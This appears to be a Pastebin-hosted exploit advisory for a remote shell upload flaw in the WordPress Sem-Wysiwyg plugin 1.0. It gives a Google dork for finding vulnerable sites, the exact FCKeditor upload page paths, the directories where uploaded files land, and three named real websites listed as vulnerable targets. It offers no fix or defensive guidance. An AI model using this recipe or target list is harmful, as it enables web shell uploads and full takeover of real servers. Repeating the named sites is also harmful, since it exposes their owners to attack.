KingSkrupellos

WordPress Sem-Wysiwyg Plugins 1.0 Remote Shell Upload Vuln

Dec 19th, 2018
362
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.41 KB | None | 0 0
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress Sem-Wysiwyg Plugins 1.0 Remote Shell Upload Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 20/12/2018
  6. # Vendor Homepage : wordpress.org
  7. # Software Download Link : N/A
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Version Information : 1.0
  11. # Exploit Risk : Medium
  12. # Google Dorks : inurl:''/wp-content/plugins/sem-wysiwyg/fckeditor/''
  13. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  14. + CWE-434- [ Unrestricted Upload of File with Dangerous Type ]
  15. # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ]
  16.  
  17. #################################################################################################
  18.  
  19. # Exploit :
  20.  
  21. /wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
  22.  
  23. /wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/browser/default/connectors/test.html
  24.  
  25. /wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/browser/default/frmupload.html
  26.  
  27. # Directory File Path :
  28.  
  29. /wp-content/uploads/.....
  30.  
  31. /wp-content/uploads/[YEAR]/[MONTH]/.....
  32.  
  33. #################################################################################################
  34.  
  35. # Note : This plugin Sem-Wysiwyg contains a very serious vulnerability that allowed hackers to gain full control –
  36.  
  37. modify, upload and execute files on any website running WordPress. With the plugin installed on a certain website,
  38.  
  39. a hacker or malicious person can gain access to the web server via HTTP through a backdoor in the plugin’s directory.
  40.  
  41. #################################################################################################
  42.  
  43. # Example Vulnerable Sites =>
  44.  
  45. [+] peaceofmindbook.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
  46.  
  47. [+] americanpathways.edu/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
  48.  
  49. [+] worklessmakemore.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
  50.  
  51. #################################################################################################
  52.  
  53. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  54.  
  55. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment